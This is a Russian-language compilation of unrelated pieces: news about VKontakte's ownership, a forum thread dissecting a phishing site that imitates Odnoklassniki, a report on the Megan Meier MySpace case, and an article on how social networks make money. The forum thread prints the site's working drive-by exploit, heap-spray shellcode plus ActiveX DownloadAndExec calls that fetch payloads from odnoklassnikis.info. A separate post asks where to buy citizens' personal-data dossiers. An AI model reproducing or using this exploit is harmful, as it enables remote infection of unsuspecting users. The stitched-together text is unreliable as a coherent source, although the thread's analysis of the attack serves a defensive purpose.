"Ведомости": сайтом Vkontakte.ru владеет семья Мирилашвили
Один из самых посещаемых сайтов российской зоне интернета, ресурс Vkontakte.ru принадлежит отцу и сыну Михаила Мирилашвили, который с 2003 года отбывает наказание, пишет газета «Ведомости». Сайтом владеет ООО «В контакте», зарегистрированное 19 января 2007 года. По ЕГРЮЛ ООО учредили Вячеслав Мирилашвили (60% уставного капитала) и Миша Мирилашвили (10%), Лев Левиев (10%) и создатель Vkontakte.ru Павел Дуров (20%). А по данным «СПАРК-Интерфакс», на 1 февраля 2008 года 100% «В контакте» принадлежало офшору Doraview Limited, зарегистрированному на Британских Виргинских островах.
ООО «В контакте» В контакте.ру Генеральный директор Павел Валерьевич Дуров Web-site www.vkontakte.ru ИНН 7842349892 Актуализация на 2008-03-01 Участники:
60.00% Digital Sky Technology 20.00% Павел Валерьевич Дуров 10.00% Михаил Мирилашвили 10.00% Лев Левиев
"Одноклассники" и "В контакте" принадлежат одному человеку
Координатор по связям с общественностью социальной сети «В контакте» Михаил Равдоникас заявил «Ведомостям», что их основным инвестором сейчас является не Вячеслав Мирилашвили, а фонд Digital Sky Technology, подконтрольный одному из крупнейших инвесторов Рунета Юрию Мильнеру.
При учреждении ООО "В контакте" (январь 2007-го) доли уставного капитала распределялись следующим образом: 20% - Павел Дуров, 10% - Лев Левиев, 60% - Вячеслав Мирилашвили и 10% - его дед Миша Мирилашвили. А по данным на 1 февраля 2008 года 100% «В контакте» принадлежало офшору Doraview Limited, зарегистрированному на Британских Виргинских островах.
Как сообщает Вебпланета, по разной информации г-н Мильнер опосредованно контролирует до 55% социальной сети "Одноклассники.ру".
У сайта «В контакте» теперь другие хозяева 03 Март, 2008 11:44:00 | 173 раз прочтено
Компания «В контакте» существует всего лишь год, однако за это время она уже успела сменить основного акционера. Отныне вместо Вячеслава Мирилашвили им является фонд Digital Sky Technology. Представители компании отказываются раскрывать детальную информацию о своих акционерах. Однако известно, что фонд Digital Sky Technology контролирует исполнительный директор NCH Advisors Григорий Фингер и бывший топ-менеджер группы «Менатеп» Юрий Мильнер. Фонд владеет миноритарным пакетом в Mail.ru, контролирует холдинг Astrum Online Entertainment и ряд других интернет-компаний.
За год могли поменяться и другие владельцы социальной сети. Как рассказал «Ведомостям» представитель одного интернет-холдинга, месяц назад один из акционеров «В контакте» предлагал ему купить 10% компании, но они не сошлись в цене.
Сайт Vkontakte.ru был зарегистрирован в октябре 2006 года, а в январе 2007 ООО «В контакте», которому сейчас и принадлежит сайт. Компанию учредили Лев Левиев (10% уставного капитала), Павел Дуров (20%) и Вячеслав (60%) и Миша Мирилашвили (10%). Последние, соответственно, сын и отец совладельца группы «Конти» Михаила Мирилашвили (с 2003 года отбывает наказание за организацию похищения и убийства двух человек). Интересно, что 1 февраля 2008 года 100% «В контакте» принадлежало офшору Doraview Limited, зарегистрированному на Британских Виргинских островах.
С 1 ноября многие аккаунты на сайте "Одноклассники.ру" подверглись нападению спам-бота: люди из вашего контакт-листа и их контакты получают оскорбления от вашего имени. Кроме того, спам-бот публикует ваши фотографии на европейских сайтах знакомств. Во многие аккаунты вносятся несанкционированные изменения. Будьте начеку!!!!!!!!
а вот вконтакте на голову выше своих ближайших конкурентов: [q]vkontakte.ru планирует предоставить пользователям возможность более точно указывать свое семейное положение[/q] ну и чтоб не думали что я шучу... это чистая правда :laugh:
Если указанная выше ссылка не открывается, скопируйте ее в буфер обмена, вставьте в адресную строку браузера и нажмите ввод. ----------------- Поскольку никогда с этого мыла никуда не регался - возникло любопытство: где цимес? В результате получен такой вот лог (сорри, что неполный, на всякий пожарный не браузером делал - заголовки не поимел: ну лень было куки стирать)
Sat Jun 07 21:32:50 2008 Соединение с www.odnoklassniks.info:80 Sat Jun 07 21:32:50 2008 Соединяемся с www.odnoklassniks.info [IP=211.95.79.57:80] Sat Jun 07 21:32:50 2008 Соединение установлено Sat Jun 07 21:32:50 2008 GET //mi?l=скипано HTTP/1.1 Sat Jun 07 21:32:50 2008 Host: www.odnoklassniks.info Sat Jun 07 21:32:50 2008 Accept: */* Sat Jun 07 21:32:50 2008 Referer: http://www.odnoklassniks.info/ Sat Jun 07 21:32:50 2008 User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98) Sat Jun 07 21:32:50 2008 Pragma: no-cache Sat Jun 07 21:32:50 2008 Cache-Control: no-cache Sat Jun 07 21:32:50 2008 Connection: close Sat Jun 07 21:32:51 2008 HTTP/1.1 301 MovedPermanently Sat Jun 07 21:32:51 2008 Date: Sat, 07 Jun 2008 18:29:56 GMT Sat Jun 07 21:32:51 2008 Server: Apache/2 Sat Jun 07 21:32:51 2008 Location: http://www.odnoklassnikis.info/update.php?скипано Sat Jun 07 21:32:51 2008 Content-Length: 355 Sat Jun 07 21:32:51 2008 Connection: close Sat Jun 07 21:32:51 2008 Content-Type: text/html; charset=iso-8859-1 Sat Jun 07 21:32:51 2008 X-Pad: avoid browser bug Sat Jun 07 21:32:51 2008 Перенаправление на http://www.odnoklassnikis.info/update.php?..._YIqfbRvkRvnZSf Sat Jun 07 21:32:51 2008 Соединение с www.odnoklassnikis.info:80 Sat Jun 07 21:32:51 2008 Соединяемся с www.odnoklassnikis.info [IP=211.95.79.57:80] Sat Jun 07 21:32:51 2008 Соединение установлено Sat Jun 07 21:32:51 2008 GET /update.php?l=скипано HTTP/1.1 Sat Jun 07 21:32:51 2008 Host: www.odnoklassnikis.info Sat Jun 07 21:32:51 2008 Accept: */* Sat Jun 07 21:32:51 2008 Referer: http://www.odnoklassnikis.info Sat Jun 07 21:32:51 2008 User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98) Sat Jun 07 21:32:51 2008 Pragma: no-cache Sat Jun 07 21:32:51 2008 Cache-Control: no-cache Sat Jun 07 21:32:51 2008 Connection: close Sat Jun 07 21:32:52 2008 HTTP/1.1 302 Found Sat Jun 07 21:32:52 2008 Date: Sat, 07 Jun 2008 18:29:57 GMT Sat Jun 07 21:32:52 2008 Server: Apache/2 Sat Jun 07 21:32:52 2008 X-Powered-By: PHP/5.2.6 Sat Jun 07 21:32:52 2008 Cache-Control: no-store, no-cache, must-revalidate Sat Jun 07 21:32:52 2008 Expires: Thu, 01 Jan 2000 00:00:00 GMT Sat Jun 07 21:32:52 2008 Last-Modified: Thu, 01 Jan 2000 00:00:00 GMT Sat Jun 07 21:32:52 2008 Pragma: no-cache Sat Jun 07 21:32:52 2008 Set-Cookie: fiesta=123; expires=Sun, 08-Jun-2008 18:29:57 GMT Sat Jun 07 21:32:52 2008 Location: http://odnoklassniki.ru/ Sat Jun 07 21:32:52 2008 Vary: Accept-Encoding,User-Agent Sat Jun 07 21:32:52 2008 Content-Length: 0 Sat Jun 07 21:32:52 2008 Connection: close Sat Jun 07 21:32:52 2008 Content-Type: text/html Sat Jun 07 21:32:52 2008 Перенаправление на http://odnoklassniki.ru/ Sat Jun 07 21:32:52 2008 Соединение с odnoklassniki.ru:80 Sat Jun 07 21:32:52 2008 Соединяемся с odnoklassniki.ru [IP=81.177.141.207:80]
поглядев адресочек данного ресурса, утвердился в мысли, что сие не совсем то, что треба:
Looking up 211.95.79.57... Using whois server whois.apnic.net.
person: Jin Yang address: No.133,Taiyun Building,Xidan North Street address: Xicheng District,Beijing,China country: CN phone: +86-10-66505588 fax-no: +86-10-66504252 e-mail: ip_address@cnuninet.com nic-hdl: JY1446-AP mnt-by: MAINT-CNNIC-AP changed: ipas@cnnic.cn 20070828 source: APNIC
inetnum: 211.90.0.0 - 211.97.255.255 netname: UNICOM descr: China United Telecommunications Corporation descr: No.133,Taiyun Building,Xidan North Street descr: Xicheng District,Beijing,China country: CN admin-c: JY7-CN tech-c: JY7-CN mnt-by: MAINT-CNNIC-AP mnt-lower: MAINT-CN-UNICOM status: ALLOCATED PORTABLE changed: ipas@cnnic.cn 20071010 source: CNNIC
person: Jin Yang nic-hdl: JY7-CN e-mail: ip_address@cnuninet.com address: No.133,Taiyun Building,Xidan North Street, Xicheng District,Beijing,China phone: +86-10-66505588 fax-no: +86-10-66504252 country: CN changed: ipas@cnnic.net.cn 20070927 mnt-by: MAINT-CNNIC-AP source: CNNIC
Вот единственное, что интересует - не увидел, на каком этапе тут кука воруется? В логе не отражено, только установка новой даты показана перед перенаправлением. На сбор спам-базы мыл непохоже (хотя мало ли: мож уникальный айди по линке, подтверждающий жизнь такого-то мыла в базе..) кто-нить поиграться не желает с ентим? В смысле, что именно это г* делает.
Возможно внутри сайта открывается ифрейм с адресом однокласники.ру и оно устанавливает кукис.. Нафига х.з.
- не-а, сам же видел лог: идет перенаправление именно. по 302 moved permanently. То есть, где-то при посещении первого должно что-то брать. Но поскольку флешгет никакие куки ниоткуда взять не может... вот любопытно на браузере как оно выглядело б.
у меня он в стенку встроен - привык им проверять. Выкинуло (сам видел как) опознавание, что домену такому-то соотв. такой-то ИП - запрос ушел на ип - я этот ип и прохуизил.
ответ с руборда: Про это уже писали там если на сайт зайти тебе копируется троян - это работает только в IE. Затем происходит перенаправление на правильный сайт.
Да интересно у них там Вот сам исполняемый скрипт
Код
<script language="JavaScript"> var m=new Array(); var mf=0; var url="http://odnoklassnikis.info/load.php";
function hex(num,width){ var digits="0123456789ABCDEF"; var hex=digits.substr(num&0xF,1); while(num>0xF){ num=num>>>4; hex=digits.substr(num&0xF,1)+hex; } var width=(width?width:0); while(hex.length<width)hex="0"+hex; return hex; }
function addr(addr){ return unescape("%u"+hex(addr&0xFFFF,4)+"%u"+hex((addr>>16)&0xFFFF,4)); }
function unes(str){ var tmp=""; for(var i=0;i<str.length;i+=4){ tmp+=addr((str.charCodeAt(i+3)<<24)+ (str.charCodeAt(i+2)<<16)+ (str.charCodeAt(i+1)<<8)+ str.charCodeAt(i)); } return unescape(tmp); }
function hav(){ mf=mf; setTimeout("hav()",2000); }
function gss(ss,sss){ while(ss.length*2<sss)ss+=ss; ss=ss.substring(0,sss/2); return ss; }
function ms(spl){ var plc=unes( "\x43\x43\x43\x43\x43\x43\xEB\x0F\x5B\x33\xC9\x66\xB9\x80\x01\x80"+ "\x33\xEF\x43\xE2\xFA\xEB\x05\xE8\xEC\xFF\xFF\xFF\x7F\x8B\x4E\xDF"+ "\xEF\xEF\xEF\x64\xAF\xE3\x64\x9F\xF3\x42\x64\x9F\xE7\x6E\x03\xEF"+ "\xEB\xEF\xEF\x64\x03\xB9\x87\x61\xA1\xE1\x03\x07\x11\xEF\xEF\xEF"+ "\x66\xAA\xEB\xB9\x87\x77\x11\x65\xE1\x07\x1F\xEF\xEF\xEF\x66\xAA"+ "\xE7\xB9\x87\xCA\x5F\x10\x2D\x07\x0D\xEF\xEF\xEF\x66\xAA\xE3\xB9"+ "\x87\x00\x21\x0F\x8F\x07\x3B\xEF\xEF\xEF\x66\xAA\xFF\xB9\x87\x2E"+ "\x96\x0A\x57\x07\x29\xEF\xEF\xEF\x66\xAA\xFB\xAF\x6F\xD7\x2C\x9A"+ "\x15\x66\xAA\xF7\x06\xE8\xEE\xEF\xEF\xB1\x66\x9A\xCB\x64\xAA\xEB"+ "\x85\xEE\xB6\x64\xBA\xF7\xB9\x07\x64\xEF\xEF\xEF\xBF\x87\xD9\xF5"+ "\xC0\x9F\x07\x78\xEF\xEF\xEF\x66\xAA\xF3\x64\x2A\x6C\x2F\xBF\x66"+ "\xAA\xCF\x87\x10\xEF\xEF\xEF\xBF\x64\xAA\xFB\x85\xED\xB6\x64\xBA"+ "\xF7\x07\x8E\xEF\xEF\xEF\xEC\xAA\xCF\x28\xEF\xB3\x91\xC1\x8A\x28"+ "\xAF\xEB\x97\x8A\xEF\xEF\x10\x9A\xCF\x64\xAA\xE3\x85\xEE\xB6\x64"+ "\xBA\xF7\x07\xAF\xEF\xEF\xEF\x85\xE8\xB7\xEC\xAA\xCB\xDC\x34\xBC"+ "\xBC\x10\x9A\xCF\xBF\xBC\x64\xAA\xF3\x85\xEA\xB6\x64\xBA\xF7\x07"+ "\xCC\xEF\xEF\xEF\x85\xEF\x10\x9A\xCF\x64\xAA\xE7\x85\xED\xB6\x64"+ "\xBA\xF7\x07\xFF\xEF\xEF\xEF\x85\x10\x64\xAA\xFF\x85\xEE\xB6\x64"+ "\xBA\xF7\x07\xEF\xEF\xEF\xEF\xAE\xB4\xBD\xEC\x0E\xEC\x0E\xEC\x0E"+ "\xEC\x0E\x6C\x03\xEB\xB5\xBC\x64\x35\x0D\x18\xBD\x10\x0F\xBA\x64"+ "\x03\x64\x92\xE7\x64\xB2\xE3\xB9\x64\x9C\xD3\x64\x9B\xF1\x97\xEC"+ "\x1C\xB9\x64\x99\xCF\xEC\x1C\xDC\x26\xA6\xAE\x42\xEC\x2C\xB9\xDC"+ "\x19\xE0\x51\xFF\xD5\x1D\x9B\xE7\x2E\x21\xE2\xEC\x1D\xAF\x04\x1E"+ "\xD4\x11\xB1\x9A\x0A\xB5\x64\x04\x64\xB5\xCB\xEC\x32\x89\x64\xE3"+ "\xA4\x64\xB5\xF3\xEC\x32\x64\xEB\x64\xEC\x2A\xB1\xB2\x2D\xE7\xEF"+ "\x07\x1B\x11\x10\x10\xBA\xBD\xA3\xA2\xA0\xA1\xEF"+url+spl); var hsta=0x0c0c0c0c,hbs=0x100000,pl=plc.length*2,sss=hbs-(pl+0x38); var ss=gss(addr(hsta),sss),hb=(hsta-hbs)/hbs; if (mf){ for (i=0;i<hb;i++)delete m[i]; CollectGarbage(); } for(i=0;i<hb;i++)m[i]=ss+plc; if(!mf){ mf=1; hav(); } return 0; }
function cobj(obj){ var ret=null; if(obj.substring(0,1)=="{"){ try{ var clsid=obj.substring(1,obj.length-1); ret=document.createElement("object"); ret.setAttribute("classid","clsid:"+clsid); return ret; }catch(e){ return null; } }else{ try{ ret=new ActiveXObject(obj); return ret; }catch(e){ return null; } } }
function attack(s){ var obj=null;
if(s==4){ try{ var obj1=cobj("{8C875948-9C60-4381-9248-0DF180542D53}"); var obj2=cobj("{BFC08CFF-C737-4433-BD5A-0EE7EFCFEE54}"); if(obj1||obj2){ try{obj1.DownloadAndExec(url+"?spl=zango1");}catch(e){} try{obj2.DownloadAndExec(url+"?spl=zango2");}catch(e){} setTimeout("attack(5)",2000); } }catch(e){} setTimeout("attack(5)",1); return 0; }
а это анализ файла, что пытаюся загрузить удаленно на машине жертвы Ссылка ----------------- Кроме вирусов клик по ссылке подтвердит что мыло валидное и живое и абонент не против получить туда пачку виагр.
Жительницу штата Миссури обвиняют в доведении до самоубийства посредством социальной сети 13-летней девочки. Трагедия, случившаяся в октябре 2006 года, вызвала широкий резонанс во всем мире: многие пользователи выступили с требованием закрыть подобные сайты во избежание аналогичных инцидентов. Однако эксперты уверены, что таким образом проблему решить не удастся.
13-летняя Меган Мейер покончила с собой в октябре 2006 года. Девочка повесилась в собственной спальне после того, как получила от виртуального друга Джоша Еванса сообщение со словами «мир будет лучше без тебя».
«Девочка повесилась после того, как получила от виртуального друга Джоша Еванса сообщение со словами «мир будет лучше без тебя» Изучив переписку, которую Меган вела в социальной сети MySpace, следователи установили, что вместо Джоша девочке писала мать ее подруги 49-летняя Лора Дрю. Таким образом женщина решила отомстить Меган, которая поссорилась с ее дочерью.
Лора Дрю создала в социальной сети страницу от имени 16-летнего юноши, приложив фото другого подростка. Женщина общалась с Мейер в течение нескольких недель, перед тем как 15 октября 2006 года «Джош» решил прекратить отношения.
Это стало серьезным ударом для девочки, которая проходила курс лечения от депрессивного заболевания и была склонна к самоубийству. Родители Меган утверждают, что Дрю знала об этом.
Сразу же после случившегося женщина уничтожила аккаунт и впоследствии отрицала, что зарегистрировалась в MySpace и общалась с Меган Мейер.
Однако в апреле 2008 года сотрудница принадлежавшего Дрю рекламного агентства «Эшли Гриллз» созналась, что зарегистрировала аккаунт Джоша по просьбе обвиняемой и написала последнее сообщение от его имени.
В итоге Лоре Дрю были предъявлены обвинения по четырем пунктам, в том числе в преступном сговоре и несанкционированном доступе к информации с целью причинить эмоциональные страдания.
Поскольку в законодательстве Миссури не было соответствующих статей, дело передали в федеральный суд. Первое заседание длилось несколько минут, Дрю признали невиновной по пунктам обвинения «заговор» и «доступ к защищенному компьютеру с целью получения информации». Дальнейшее рассмотрение дела назначено на 26 июля, сообщает Telegraph.
Самоубийство Меган Мейер вызвало широкий резонанс во всем мире: пользователи стали призывать к закрытию социальных сетей во избежание подобных инцидентов.
Однако эксперты считают, что таким образом проблему решить не удастся.
«Случаи доведения до самоубийства фиксировались всегда путем рассылки обычных почтовых писем или телеграмм. Естественно, новый инструмент Интернет люди используют как во благо, так и во вред», рассказал газете ВЗГЛЯД директор департамента по связям с общественностью RU-Center Андрей Воробьев.
По мнению эксперта, это вовсе не значит, что нужно всех лишить возможности пользоваться социальными сетями.
«В первую очередь, необходимо уделить больше внимания воспитанию культуры пользователя, причем с детских лет. А те законы, которые действуют в офлайне, можно применить и для онлайна. В данном случае в российском законодательстве существует уголовная статья, предусматривающая наказание за доведение до самоубийства. Не нужно придумывать новых законов, важно применять уже существующие», подытожил Воробьев.
Аналогичного мнения придерживаются и психологи.
«Интернет в этом случае выступает лишь средством, которым как и сотовой или почтовой связью могут воспользоваться для причинения вреда. Здесь всё дело в людях. Единственным спасением в этой ситуации является поддержка со стороны взрослых, в частности, родителей», пояснил газете ВЗГЛЯД директор центра психолого-педагогической реабилитации и коррекции «Практик» Александр Красило.
«В наше непростое время родители, занятые работой, должны больше времени уделять своим детям. Я сторонник того, что подростков нужно воспитывать с уверенностью, что у них всегда есть поддержка и люди, которые их поймут и помогут в непростой ситуации. Здесь свою роль должны играть и СМИ, и сам Интернет. Ребенок не должен чувствовать себя одиноким», уверен психолог.
Группа: Banned
Сообщений: 3286
Регистрация: 16.04.08
Вне форума
Предупреждения: (100%)
Цитата(ber @ 29 Февраля, 2008, 7:11)
адресные и телефонные базы качаются или покупаются на рынке
а где купить то? по новостям показывали что на Киевском РР продаются базы граждан Украины с полными данными: телефоны,адреса,паспортные данные,места работы, другими словами полное досье на каждого.
Деньги ловят сетью Газета ВЗГЛЯД выяснила, на чем зарабатывают крупнейшие мировые и отечественные социальные сети
Популярность социальных сетей возрастает с каждым годом. И владеющие ими компании пытаются найти способ конвертировать огромную популярность в высокие прибыли. По мнению экспертов, в настоящий момент существует четыре основных способа заработать на соцсетях: платные сервисы и функции, рекламные места, продажа влияния на общественное мнение и превращение огромных баз данных пользователей в деньги.
Социальные сети являются едва ли не самой динамично развивающейся частью Интернета. По данным одной из крупнейших интернет-маркетинговых компаний comScore, в апреле 2008 года на самой популярной социальной сети в мире Facebook было зарегистрировано более 132 миллионов пользователей. У ближайшего преследователя MySpace более 117 миллионов клиентов. На самых популярных российских сетях, «Одноклассники» и «Вконтакте», зарегистрированы более 20 и 16 миллионов пользователей соответственно.
Платные сервисы и функции
«Банки не отказывают соцсетям в кредитах. Разве это не свидетельство того, что базы данных сетей будут приносить огромные прибыли?»
Одним из самых простых способов получить прибыль на социальной сети является предоставление платных сервисов и функций. При этом существует три основных стратегии привлечения пользователя к платному сервису.
Зачастую компании начинают предоставлять новые, очень удобные функции по невысокой цене. В этом случае они создают новое предложение, от которого пользователь вряд ли откажется.
Иногда сервис или функцию, которые раньше были бесплатными, владельцы соцсети начинают предлагать за деньги. В этом случае компания сначала «подсаживает» пользователя «на иглу», а потом предлагает ему заплатить некоторую сумму, чтобы не отказываться от привычки пользоваться некоторой функцией.
И, наконец, самым необычным является предложение за деньги отключить некоторые «мешающие» функции сети. Подобную тактику, в частности, применила сеть «Одноклассники», которая ввела платную услугу «Невидимка», позволяющую на 30 дней отключить сообщения о том, что пользователь находится в сети, и о том, какие страницы он посещал. Услуга пользуется популярностью: многие хотят, чтобы, например, жена или муж не узнали, что вторая половина посещала страницы прежних возлюбленных.
Реклама
На эту темуИнтернет уходит в космос В Рунете собирают компромат Вторая жизнь в компьютере Блоги обогнали Rambler Социальные сети атакуют вирусы
Ключевые слова: будущее России, инновации, интернет
Огромные прибыли социальным сетям может приносить реклама. Однако для этого компаниям необходимо разработать инструментарий, чтобы их рекламное предложение стало направленным.
У интернет-рекламы есть большой плюс она значительно более эффективна, поскольку позволяет рекламировать товары, интересные конкретному потребителю. Подобная практика существует и на телевидении например, во время трансляции футбольного матча рекламируется пиво, а не косметика. Но в Интернете это одно из основных условий.
Но есть и минусы: пользователь, который заходит на сайт социальной сети, совершенно не заинтересован в потреблении товаров. На телевидении реклама прерывает телепередачи, поэтому у зрителя нет возможности продолжить просмотр, пропустив ее. В то же время на сайте соцсети пользователь может продолжать общение с друзьями, не обращая внимания на рекламу.
Интересно отметить, что с подобной трудностью не сталкиваются поисковые системы, такие как Google, Yahho или Яндекс, так как на их страницы пользователь часто заходит именно с целью отыскать какой-либо товар.
Для увеличения эффективности рекламы социальные сети вынуждены поменять ее направленность. Существует два основных пути: сменить поставщика рекламы или сам рекламируемый товар в зависимости от интересов пользователя. Подобный прием получил название поведенческий таргетинг.
По первому пути пошла компания Facebook, запустившая специальную функцию Beacon. Она заключила с несколькими интернет-магазинами такой договор: информация о том, что пользователь приобрел какой-либо товар в этом магазине, будет распространяться среди друзей пользователя по каналам Facebook. Люди больше склоны доверять информации от своих друзей, чем просто рекламному сообщению, поэтому компании и платили Facebook.
Но отказаться от Beacon было невозможно, и многие пользователи сочли подобную практику нарушением права на частную жизнь и договоров о конфиденциальности предоставляемой информации. В частности, Кэтрин Элейн Харрис из Техаса подала в суд на интернет-магазин фильмов Blockbuster за нарушение закона о конфиденциальности приобретений. В результате Facebook был вынужден сделать согласие пользователя необходимым для включения функции Beacon.
Вторую стратегию выбрала компания MySpace. Она запустила систему HyperTargeting, собирающую информацию о всех действиях пользователя на сайте. На основе этой и предоставляемой пользователем в профиле информации программа выбирала товар, который следует рекламировать конкретному потребителю с учетом его интересов. Запуск программы уже привел к увеличению стоимости рекламы на MySpace, однако программа работает не идеально. Компания постоянно пытается довести ее до совершенства, в настоящий момент работает уже двенадцатая ее версия.
Пропаганда и лоббирование интересов
Социальные сети обладают огромной аудиторией. Создание сети со 100 миллионами пользователей стоит значительно дешевле, чем создание телеканала со 100 миллионами зрителей. И сети не могли не использовать возможность привлекать людей, стремящихся изменить общественное мнение.
Уже сейчас социальные сети стали ареной политической борьбы как внутренней, так и международной. Кандидаты на различных выборах создают свои страницы и группы, пытаясь привлечь как можно больше сторонников. К примеру, в Facebook существует предложение, позволяющее обмениваться новостями и статьями, посвященными предвыборной кампании Барака Обамы. Противник Обамы Джон Маккейн предложил своим сторонникам установить на их страницах в Facebook картинку «Официальный знак Маккейна».
Борьба за сторонников часто разворачивается и во время различных международных событий. К примеру, сейчас на всех американских социальных сетях действует огромное количество групп и приложений, созданных в поддержку ужесточения или, наоборот, смягчения позиции США по вопросу ядерной программы Ирана. Борцы за общественное мнение готовы платить, и сети могут на этом заработать.
Огромное поле для деятельности открывается также для лоббистов крупных компаний. Социальные сети предоставляют отличную возможность повлиять на общество, заставив требовать запрета конкурентного товара или поддерживать иные интересы компании. Учитывая, что расходы крупных компаний на лоббирование интересов зачастую превышают миллиард долларов в год, социальные сети могут получить свою долю.
Базы данных о пользователях
Однако, по мнению многих экспертов, получение прибыли сейчас не является приоритетным для социальных сетей. «Компании готовы вкладывать, чтобы собрать данные о как можно большем количестве пользователей», заявил газете ВЗГЛЯД эксперт по тенденциям развития медиарынков и рынков высоких технологий Сергей Пименов, генеральный продюсер телеканала Russia.Ru.
Тайны метросексуалов и рэперов
Бестселлеры, доступные всем По мнению Пименова, в современном мире информация является одним из самых дорогих товаров. «Компании готовы платить за информацию, и сейчас социальные сети проходят только первый этап ее сбор, уверен он. Сейчас они не ищут прибыли, они пытаются нарастить будущий потенциал».
Многие инвестиционные фонды и банки сейчас готовы вкладываться в социальные сети и предоставлять им кредиты, и это подтверждает правоту Пименова. «Посмотрите, крупные инвестиционные фонды не отказывают социальным сетям в кредитах. Разве это не является свидетельством того, что в будущем базы данных сетей будут приносить огромные прибыли? Крупные игроки финансового рынка редко так единодушно ошибаются в своих прогнозах», заявил он.
Пименов подчеркивает, что договоры о защите информации пользователя не закрывают доступ к ней другим компаниям. «Практически всегда в договор включен пункт, в котором сообщается, что базы данных передаются компании, купившей пакет акций социальной сети, чтобы она могла оказывать пользователям поддержку и улучшать сервисы. То есть компании достаточно купить 1% акций, и она получит доступ ко всей информации, которую сообщает про себя сам пользователь и его друзья», пояснил он.